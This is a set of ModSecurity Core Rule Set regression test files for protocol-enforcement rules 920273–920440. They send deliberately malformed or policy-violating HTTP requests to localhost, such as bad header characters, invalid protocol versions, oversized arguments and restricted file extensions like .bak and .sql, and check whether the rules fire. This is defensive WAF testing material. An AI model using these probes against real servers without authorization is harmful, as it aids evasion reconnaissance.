Host: "localhost"
output:
no_log_contains: "id \"920273\""
-
test_title: 920273-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%60HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""

85
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml Normal file
View File

@@ -0,0 +1,85 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920274.yaml"
description: "Description"
tests:
-
# Apache will just error on this and return 400
# as a result we look for forbidden or 400
# In the future FTW should support OR versus AND output
# https://github.com/CRS-support/ftw/issues/19
test_title: 920274-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%1F"
output:
status: [200, 403, 400]
# log_contains: "id \"920274\""
-
test_title: 920274-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "<ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920274\""
-
test_title: 920274-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisISATEST%5F"
output:
no_log_contains: "id \"920274\""
-
test_title: 920274-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisIsATest%60"
output:
log_contains: "id \"920274\""
-
test_title: 920274-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: "ThisIsATest%60"
output:
no_log_contains: "id \"920274\""

47
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml Normal file
View File

@@ -0,0 +1,47 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920280.yaml"
description: "Description"
tests:
-
test_title: 920280-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
log_contains: "id \"920280\""
-
test_title: 920280-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920280\""
-
test_title: 920280-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/0.9"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
# Technically valid but Apache doesn't allow 0.9 anymore
status: 400

51
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml Normal file
View File

@@ -0,0 +1,51 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920290.yaml"
description: "Description"
tests:
-
# Apache will block this with a 400 and it will
# never get to CRS. We will fix this more when
# FTW supports the OR operator for outputs.
test_title: 920290-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: ""
output:
status: [403, 400]
#log_contains: "id \"920290\""
#-
#test_title: 920290-2
#stages:
# -
# stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "%00"
# output:
# no_log_contains: "id \"920290\""
# -
# test_title: 920290-3
# stages:
# -
# stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# output:
# no_log_contains: "id \"920290\""

30
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml Normal file
View File

@@ -0,0 +1,30 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920300.yaml
tests:
-
test_title: 920300-1
desc: Request Missing an Accept Header (920300) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: ''
output:
log_contains: id "920300"

93
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml Normal file
View File

@@ -0,0 +1,93 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920310.yaml"
description: "Description"
tests:
-
test_title: 920310-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
-
test_title: 920310-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
-
test_title: 920310-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
-
test_title: 920310-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: lol
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
-
test_title: 920310-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Business/6.6.1.2 CFNetwork/758.5.3 Darwin/15.6.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
-
test_title: 920310-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Entreprise/6.5.0.177 CFNetwork/758.4.3 Darwin/15.5.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""

48
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml Normal file
View File

@@ -0,0 +1,48 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920311.yaml"
description: "Description"
tests:
-
test_title: 920311-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920311\""
-
test_title: 920311-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920311\""
-
test_title: 920311-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: "text/plain, text/html"
output:
no_log_contains: "id \"920311\""

32
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml Normal file
View File

@@ -0,0 +1,32 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
-
test_title: 920320-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
output:
log_contains: "id \"920320\""
-
test_title: 920320-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920320\""

33
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml Normal file
View File

@@ -0,0 +1,33 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
-
test_title: 920330-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: ""
Host: "localhost"
output:
log_contains: "id \"920330\""
-
test_title: 920330-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920330\""

38
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml Normal file
View File

@@ -0,0 +1,38 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920340.yaml"
description: "Description"
tests:
-
test_title: 920340-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "2"
data: "xy"
stop_magic: true
output:
log_contains: "id \"920340\""
-
test_title: 920340-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "50"
stop_magic: true
output:
expect_error: true

55
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml Normal file
View File

@@ -0,0 +1,55 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920350.yaml"
description: "Description"
tests:
-
test_title: 920350-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "127.0.0.1"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""
-
test_title: 920350-2
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920350\""
-
test_title: 920350-3
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "1.2.3.4"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""

31
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml Normal file
View File

@@ -0,0 +1,31 @@
---
meta:
author: csanders-git
description: None
# ARG_NAME_LENGTH needs to be set in crs-config
enabled: false
name: 920360.yaml
tests:
-
test_title: 920360-1
desc: Argument name too long (920360) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo
version: HTTP/1.0
output:
log_contains: id "920360"

31
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml Normal file
View File

@@ -0,0 +1,31 @@
---
meta:
author: csanders-git
description: None
# PCRE limits need to be set higher to process this
enabled: false
name: 920370.yaml
tests:
-
test_title: 920370-1
desc: Argument value too long (920370) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
version: HTTP/1.0
output:
log_contains: id "920370"

31
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml Normal file
View File

@@ -0,0 +1,31 @@
---
meta:
author: csanders-git
description: None
# MAX_NUM_ARGS needs to be set in crs-setup
enabled: false
name: 920380.yaml
tests:
-
test_title: 920380-1
desc: Too many arguments in request (920380) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?param1=1&param2=1&param3=1&param4=1&param5=1&param6=1&param7=1&param8=1&param9=1&param10=1&param11=1&param12=1&param13=1&param14=1&param15=1&param16=1&param17=1&param18=1&param19=1&param20=1&param21=1&param22=1&param23=1&param24=1&param25=1&param26=1&param27=1&param28=1&param29=1&param30=1&param31=1&param32=1&param33=1&param34=1&param35=1&param36=1&param37=1&param38=1&param39=1&param40=1&param41=1&param42=1&param43=1&param44=1&param45=1&param46=1&param47=1&param48=1&param49=1&param50=1&param51=1&param52=1&param53=1&param54=1&param55=1&param56=1&param57=1&param58=1&param59=1&param60=1&param61=1&param62=1&param63=1&param64=1&param65=1&param66=1&param67=1&param68=1&param69=1&param70=1&param71=1&param72=1&param73=1&param74=1&param75=1&param76=1&param77=1&param78=1&param79=1&param80=1&param81=1&param82=1&param83=1&param84=1&param85=1&param86=1&param87=1&param88=1&param89=1&param90=1&param91=1&param92=1&param93=1&param94=1&param95=1&param96=1&param97=1&param98=1&param99=1&param100=1&param101=1&param102=1&param103=1&param104=1&param105=1&param106=1&param107=1&param108=1&param109=1&param110=1&param111=1&param112=1&param113=1&param114=1&param115=1&param116=1&param117=1&param118=1&param119=1&param120=1&param121=1&param122=1&param123=1&param124=1&param125=1&param126=1&param127=1&param128=1&param129=1&param130=1&param131=1&param132=1&param133=1&param134=1&param135=1&param136=1&param137=1&param138=1&param139=1&param140=1&param141=1&param142=1&param143=1&param144=1&param145=1&param146=1&param147=1&param148=1&param149=1&param150=1&param151=1&param152=1&param153=1&param154=1&param155=1&param156=1&param157=1&param158=1&param159=1&param160=1&param161=1&param162=1&param163=1&param164=1&param165=1&param166=1&param167=1&param168=1&param169=1&param170=1&param171=1&param172=1&param173=1&param174=1&param175=1&param176=1&param177=1&param178=1&param179=1&param180=1&param181=1&param182=1&param183=1&param184=1&param185=1&param186=1&param187=1&param188=1&param189=1&param190=1&param191=1&param192=1&param193=1&param194=1&param195=1&param196=1&param197=1&param198=1&param199=1&param200=1&param201=1&param202=1&param203=1&param204=1&param205=1&param206=1&param207=1&param208=1&param209=1&param210=1&param211=1&param212=1&param213=1&param214=1&param215=1&param216=1&param217=1&param218=1&param219=1&param220=1&param221=1&param222=1&param223=1&param224=1&param225=1&param226=1&param227=1&param228=1&param229=1&param230=1&param231=1&param232=1&param233=1&param234=1&param235=1&param236=1&param237=1&param238=1&param239=1&param240=1&param241=1&param242=1&param243=1&param244=1&param245=1&param246=1&param247=1&param248=1&param249=1&param250=1&param251=1&param252=1&param253=1&param254=1&param255=1&param256=1
version: HTTP/1.0
output:
log_contains: id "920380"

34
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml Normal file
View File

File diff suppressed because one or more lines are too long

52
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml Normal file
View File

@@ -0,0 +1,52 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920400.yaml
tests:
-
test_title: 920400-1
desc: Uploaded file size too large (920400) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Length: '10485760'
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="file"; filename="test"'
- 'Content-Type: application/octet-stream'
- ''
- Rotem & Ayala
- ''
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="name"'
- ''
- tt2
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="B1"'
- ''
- Submit
- '-----------------------------265001916915724--'
output:
# Most web servers simply won't respond to invalid requests like
# like this they'll just time out when we get OR type checks
# we'll be able to check for both an error or the rule firing
expect_error: true

284
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml Normal file
View File

@@ -0,0 +1,284 @@
---
meta:
author: "csanders-git, Franziska Bühler"
enabled: true
name: "920420.yaml"
description: "Description"
tests:
-
test_title: 920420-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "test=value"
output:
no_log_contains: "id \"920420\""
-
test_title: 920420-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "PROPFIND"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-5
desc: Request content type is not allowed by policy (920420) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/; boundary=0000
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- --0000
- 'Content-Disposition: form-data; name="name"'
- ''
- John Smith
- --0000
- 'Content-Disposition: form-data; name="email"'
- ''
- john.smith@example.com
- --0000
- 'Content-Disposition: form-data; name="image"; filename="image.jpg"'
- 'Content-Type: image/jpeg'
- ''
- BINARYDATA
- --0000--
output:
log_contains: id "920420"
-
test_title: 920420-6
desc: Request content type is not allowed by policy (920420) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/foo; boundary=0000
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- --0000
- 'Content-Disposition: form-data; name="name"'
- ''
- John Smith
- --0000
- 'Content-Disposition: form-data; name="email"'
- ''
- john.smith@example.com
- --0000
- 'Content-Disposition: form-data; name="image"; filename="image.jpg"'
- 'Content-Type: image/jpeg'
- ''
- BINARYDATA
- --0000--
output:
log_contains: id "920420"
-
test_title: 920420-7
desc: Request content type is not allowed by policy (920420) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Type: application/foo; boundary=0000
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- --0000
- 'Content-Disposition: form-data; name="name"'
- ''
- John Smith
- --0000
- 'Content-Disposition: form-data; name="email"'
- ''
- john.smith@example.com
- --0000
- 'Content-Disposition: form-data; name="image"; filename="image.jpg"'
- 'Content-Type: image/jpeg'
- ''
- BINARYDATA
- --0000--
output:
log_contains: id "920420"
-
test_title: 920420-8
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "HEAD"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-9
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/json"
data: "test"
output:
no_log_contains: "id \"920420\""
-
test_title: 920420-10
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/soap+xml"
data: "test"
output:
no_log_contains: "id \"920420\""
-
test_title: 920420-11
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-12
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "HEAD"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "multipart/related"
data: "test"
output:
no_log_contains: "id \"920420\""
-
test_title: 920420-13
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "HEAD"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "Multipart/Related"
data: "test"
output:
no_log_contains: "id \"920420\""

184
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml Normal file
View File

@@ -0,0 +1,184 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920430.yaml"
description: "Description"
tests:
-
test_title: 920430-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920430\""
-
test_title: 920430-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920430\""
-
test_title: 920430-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/0.9"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 400]
# log_contains: "id \"920430\""
-
test_title: 920430-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/2"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920430\""
-
# Currently FTW won't process HTTP 1.0 simple response items
# This request generates such a response, so even though it will
# generate the alert, it will error.
test_title: 920430-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: ""
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN"
Host: "localhost"
output:
expect_error: true
-
test_title: 920430-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "1.1"
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN"
Host: "localhost"
output:
status: [403, 400]
# log_contains: "id \"920430\""
-
test_title: 920430-7
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "TEST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 400]
# log_contains: "id \"920430\""
-
test_title: 920430-8
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/3.0
output:
log_contains: id "920430"
-
test_title: 920430-9
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/0.8
output:
status: [403, 400]
#log_contains: id "920430"
-
test_title: 920430-10
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: JUNK/1.0
output:
status: [403, 400]
# log_contains: id "920430"

113
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml Normal file
View File

@@ -0,0 +1,113 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920440.yaml
tests:
- test_title: 920440-1
desc: URL file extension is restricted by policy (920440) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.bak
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-2
desc: URL file extension is restricted by policy (920440) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.db
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-3
desc: URL file extension is restricted by policy (920440) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.old
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-4
desc: URL file extension is restricted by policy (920440) - GH issue 1296
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.bar.sql
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-5
desc: Redis dump file
stages:
